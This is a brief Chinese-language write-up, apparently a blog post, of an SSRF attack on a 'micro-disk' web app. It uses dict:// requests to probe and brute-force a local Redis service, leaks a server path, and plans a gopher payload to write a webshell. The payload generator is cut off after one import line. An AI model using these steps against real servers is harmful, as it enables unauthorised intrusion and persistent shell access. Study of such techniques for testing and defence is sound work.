旁观的时候,每个人都是智者
经典的微盘ssrf,有回显
file协议读取被拦截
使用dict协议请求 6379
端口,看到返回 banner
信息,说明端口开放
可以再请求 dict://127.0.0.1:6379/info
如果能看到 redis
以及系统的一些信息,就说明存在未授权
如果返回 Authentication required
就是需要密码
可以使用dict协议爆破密码:dict://127.0.0.1:6379/auth:<password>
访问漏洞api
地址爆出绝对路径 /application/index/controller/Api.php
有了绝对路径就可以写shell了
使用如下代码生成 gopher
的 payload
1 | import urllib.parse |
上面信息按需填写,然后直接运行就可以生成攻击payload了
直接请求写入shell
访问